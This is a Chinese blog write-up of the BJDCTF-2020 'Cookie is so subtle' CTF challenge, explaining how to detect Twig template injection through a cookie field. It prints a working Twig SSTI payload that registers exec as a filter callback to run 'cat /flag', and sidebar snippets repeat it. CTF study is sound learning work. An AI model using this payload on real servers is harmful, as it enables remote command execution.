[BJDCTF-2020]Web-Cookie is so subtle

最新推荐文章于 2023-12-13 11:18:25 发布
最新推荐文章于 2023-12-13 11:18:25 发布
阅读量575 收藏 1
点赞数
分类专栏: CTF SSTI 复现 文章标签: web安全 安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mrs_H/article/details/121287762
版权
CTF 同时被 3 个专栏收录
31 篇文章 1 订阅
订阅专栏
复现
31 篇文章 3 订阅
订阅专栏
SSTI
8 篇文章 0 订阅
订阅专栏

[BJDCTF-2020]Web-Cookie is so subtle

一.前言

在上一篇有关thinkphp3.2版本的考古漏洞中,我曾提到要先将sql注入漏洞的学习放缓一阵,是时候转头去复习一下其他方面的漏洞了。关于SSTI的话,其实以前是有学习过的,但是大部分关于SSTI的学习都是通过一些简单基础的靶场习题进行学习的,并没有学太多原理方面的知识。从现在开始,要通过BUU的靶场对SSTI的类型习题做一下集中的复习了。

正文

作为我开始复习SSTI的第一篇习题,我并没有选择太难的题目,选择了一个较为简单的题目。因为之前的学习过程里大部分的学习都几乎只局限于jinja2模板,所以这道题还是能学到一些东西的。
首先,打开题目
进入flag界面
在这里插入图片描述
我们随便输一个内容
请添加图片描述
从旁边的Cookie界面中我们发现了一个问题,就是我们一开始在输入框中输入的内容被放进了Cookie中的user字段里面。而且我们输入的内容在前端界面上也有回显,这让我们联想到可能是要利用Cookie进行模板注入。
我们随便输入一个payload看一下{{1}}
请添加图片描述
我们看到前端给我们的回显界面已经成功地渲染出来了我们刚刚传进去的内容。我们以此判断这个Cookie存在模板注入,我们再次深入的调查一下所用模板的情况
我们这一次传入{{'7'*7}}
请添加图片描述
我们来看一下回显
请添加图片描述
下面这句话引自知乎(https://zhuanlan.zhihu.com/p/28823933)

{{7*‘7’}}会在 Twig 中返回49,而在 Jinja2 中则是7777777

我们基于此判断出它的模板类型是Twig
我们构造如下的payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

前者是将exec注册为getFilter的回调函数,后面就是通过getFilter里面的回调函数进行函数调用。
详细的getFilter代码段如下
(仍摘自上面那篇知乎文章)

public function getFilter($name)
  {
    ...
    foreach ($this->filterCallbacks as $callback) {
    if (false !== $filter = call_user_func($callback, $name)) {
      return $filter;
    }
  }
  return false;
}
 
public function registerUndefinedFilterCallback($callable)
{
  $this->filterCallbacks[] = $callable;
}

最终我们通过burp发包成功拿到flag
请添加图片描述

后记

这一次接触了Twig模板的注入,以前的话接触过smarty,jinja2。但是Twig真的是第一次遇见,就当积累经验了。

入山梵行
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python嵌套函数使用外部函数变量的方法(Python2和Python3)
09-21
主要介绍了python嵌套函数使用外部函数变量的方法,需要的朋友可以参考下
Subtle-Subtitle:iTunes 字幕
06-20
微妙的字幕 Subtle Subtitle 是一个 OS X 应用程序,用于在 iTunes 中显示正在播放的电影的字幕。 它是一个类似 HUD 的窗口,类似于原始 iTunes 电影的字幕,同时加载用户指定的 .srt 文件。 因此,它可以从 3rd 方或任何地方获取您自己语言的字幕。 特征 将 .srt 文件拖到 Dock 的图标上以打开。 字幕窗口可以拖动。 订阅 iTunes 播放事件。 电影和字幕之间的延迟。 使用箭头键进行调整。 计划 使用辅助功能获取 iTunes 电影窗口的位置,并附加字幕窗口。
NSSCTF第15页(3)
最新发布
wwwwyyyrre的博客
12-13 181
这道题有一个简单的反序列化,然后正则限制了很多函数看了wp才知道利用的函数是create_function()函数php//";看目录看flag。
NSSCTF web刷题记录4
rev1ve的博客
11-06 290
大体流程就是先获取所有的GET和POST请求,然后一次性发送,观察是否存在可利用的shell,如果成功再先判断所有的GET里是否存在,然后判断POST里是否存在shell,通过flag参数值判断为哪个方式,最后输出可利用的shell文件。分析一下,main函数首先检测参数是否小于2,然后创建了一个http.FileServer,并传入fs.CreateFileServFS()函数的返回值作为参数,能够访问文件。我们输入1,1看看,发现有hint是随机数,并且我们修改code的值,随机数固定不变。
【Web】BJDCTF 2020 个人复现
uuzeray的博客
11-29 679
create_function()注入($code不能一直只是小写字母和数字组成)EGPCS绕过$_REQUEST的字母匹配(记得清空cookie)user=这部分就是我们在flag.php输入的内容。url编码绕过QUERY_STRING的正则匹配。直接访问/rea1fl4g.php没有结果。base64解码得next.php源码。先在flag.php输入admin。跳转到levell14.php。在hint.php右键查看源码。访问/1nD3x.php。告诉了我们flag的路径。三步试出来是Twig。
BJDCTF-2020-Web-Cookie is so subtle!
feng的博客
11-02 667
知识点 Cookie(其实这个点可以不用管) SSTI WP 首先环境有三个页面,分别是index.php,flag.php,hint.php。hint.php的源码里有个提示: <!-- Why not take a closer look at cookies? --> 然后flag.php里是一个输入框,输入什么它就会回显什么。这时候看看cookie,发现突然多了user: 说明这个页面是根据cookie里的user来回显的。经过尝试,这里存在模板注入。 其实这题cookie没啥
BJDCTF-2020-Web-Cookie is so subtle!(ssti模板注入+cookie处注入)
weixin_45844670的博客
09-24 565
既然提示了是和cookie有关系 那么先看cookie 没什么东西 然后去flag界面查看一下 发现多了一个user参数 这里存在注入 考虑可能是SSTI注入 尝试一下 123{{9+9}} 确实可以 存在twig模板注入 payload {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 参考链接:https://www.k0rz3n.com/2018/11/12/%E4
buuctf web cookie is so subtle
qq_41696858的博客
12-19 923
题目给出了hint,这题的主要利用方法在cookie里,在页面里的hint.php也让我们看看cookie 提交一个1,发现cookie里多了一个user=1 尝试user=admin,没用,直接回显。Hello,admin 考虑一下模板注入{{7*7}},回显,hello,49 到这这题就基本上结束了,查询到后端技术是PHP,查询了一下,php模板框架,常用的两种smarty或者twig 尝试{{$smarty.version}},失败,尝试twig注入的时候,发现成功回显 payload:{{_self
第 四 周 write up (BJDCTF-2020-Web-Cookie is so subtle! Bugku 蹭网先解开密码 [网鼎杯 2020 青龙组]AreUSerialz nmap)
tothemoon的博客
10-15 587
BJDCTF-2020-Web-Cookie is so subtle!(twig,ssti) 先百度 瞎测了一下,居然测出给git泄露了? 跑了下脚本,不是git泄露。 淦 重新开始 在hint下面发现了提示 在flag.php页面登陆后,抓包发现,cookie里面多了变量user。 看了大佬的提示:是模板注入,靠,这怎么想得到啊。菜鸡我是真的涨姿势了。 如果输入{{7*’7’}}如果 输出7777777 则是jinja2模板 如果是 49 则是 twig模板 这里输出了4
subtle-开源
05-13
subtle是基于网格的手动平铺窗口管理器,非常注重简单但可自定义的外观。 与其他平铺窗口管理器相比,subtle不会以任何方式自动平铺屏幕大小。
Subtle Patterns-crx插件
04-02
让网络设计师预览在其网站背景中平铺的[Subtle Patterns](http://subtlepatterns.com)。 通过此Chrome扩展程序,网络设计师可以预览前200个[Subtle Patterns](http://subtlepatterns.com)中的任何一个,因为它们...
Subtle Scrollbars-crx插件
04-04
语言:English 半薄滚动条,样式设置为将背景与页面内容融合在一起 将股票滚动条替换为6px宽的版本,该版本具有圆形末端,无箭头和试图与页面融合的背景。 条形为中灰色,悬停时为黑色。 下拉菜单等UI元素的滚动条...
Random Subtle Patterns-crx插件
04-06
语言:English 此扩展程序在新选项卡上显示新的“微妙模式”。 当您打开新标签页时,显示来自subtlepatterns.com的新Subtle Pattern。
WEB-INF/web.xml泄露漏洞及其利用
Mrs_H的博客
08-10 9745
前言 之所以写这篇文章,是因为最近在做题的时候,做到了一个有关java的题目。因为对Java Web方面的开发经验很少,所以在做这道题的时候,查了一些关于Java Web相关的知识。感觉以后说不定还会用到,就以这篇文章来总结一下。 关于WEB-INF/web.xml 在了解WEB-INF/web.xml泄露之前,我们先要知道,web.xml是一个什么样的文件,以及它的泄露会出现哪些问题。 咱们先来看看WEB-INF这个文件夹 WEB-INF主要包含以下内容: /WEB-INF/web.xml:Web应用程
[De1CTF 2019]SSRF Me——一个好的开端
Mrs_H的博客
12-02 3339
[De1CTF 2019]SSRF Me 一.前言 今天抽出时间来学ssrf了,老样子最一开始的学习阶段会从简单的题目进行入手,然后逐渐去往深层次的方面学习。但是最近应该不会写博客写的那么频繁了,有关CTF的事情也都会放一放了,因为要期末了,而且因为一些缘故,期末考试的时间应该会提前,要开始忙起来了。 二.正文 题目没有给前端界面,直接把项目的源码打在了首页上面。源码如下: #! /usr/bin/env python # #encoding=utf-8 from flask import Flask fr
[SCTF2019]Flag Shop——瞧,这是个新来的
Mrs_H的博客
11-23 2920
[SCTF2019]Flag Shop 一.前言 这几天一直有事,导致之前的比赛的WP也没看,然后靶场这方面的学习也没推进下去,终于找了个时间的空挡做了道关于Ruby的模板注入。为了这道题我甚至抽出了我本就不多的时间去学了学Ruby的语法,话说学完Ruby之后,我的感触是他与Python等脚本语言很像,但是它的语法中字里行间都透露着Java等语言的关系。关于这次的SSTI题目,与其他的SSTI有着很大的不同。 二.正文 老样子,我们先看题目 题目的意思很简单就是我们要通过足够的jinkela来购买flag
[CSCCTF 2019 Qual]FlaskLight——直取flag?
Mrs_H的博客
11-16 2163
[CSCCTF 2019 Qual]FlaskLight 前言 白天一直在上课,晚上赶快躲进图书馆里面打打靶场。这次的题目算是很简单的一道题目了,我做完之后还去看了看其他师傅写的博客,只能感叹一声太强了。我根本就没有考虑这些,就直接去找flag了。 正文 很喜欢这样的题目,在每一步之后出题人都会贴心的留下下一步的线索,不至于做完第一步后,不知道自己在干嘛,甚至是不知道自己第一步做对了没有。打开题目 出题人让我们用get进行传参,向这个网站里面传一个search进去。我们尝试之后发现这个地方存在SSTI。
[红明谷CTF 2021]JavaWeb
Mrs_H的博客
04-08 1996
[红明谷CTF 2021]JavaWeb 一.前言 好像是已经很久不刷题了,因为最近一直在忙着复习高数和专业课,拿不出太多的时间来打CTF。但是这次也总算是找到了点时间,做道java的简单题来放松一下,不能总是学那些书本上的知识了,感觉学多了也会烦。 二.正文 这道题目上来就让我们访问/login目录,所以我们直接访问试试看。 服务器那边又让我们访问/json的路径,但是我们如果用post方法对服务器进行访问的话,服务器又会返回另外的结果。 这里的登陆失败,就表明我们需要进行身份验证,我们尝试输入一对用
text-shadow
04-06
Text-shadow is a CSS property that enables you to add a shadow effect to text on a web page. This property allows you to create a variety of effects, from subtle shadows to dramatic, eye-catching ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值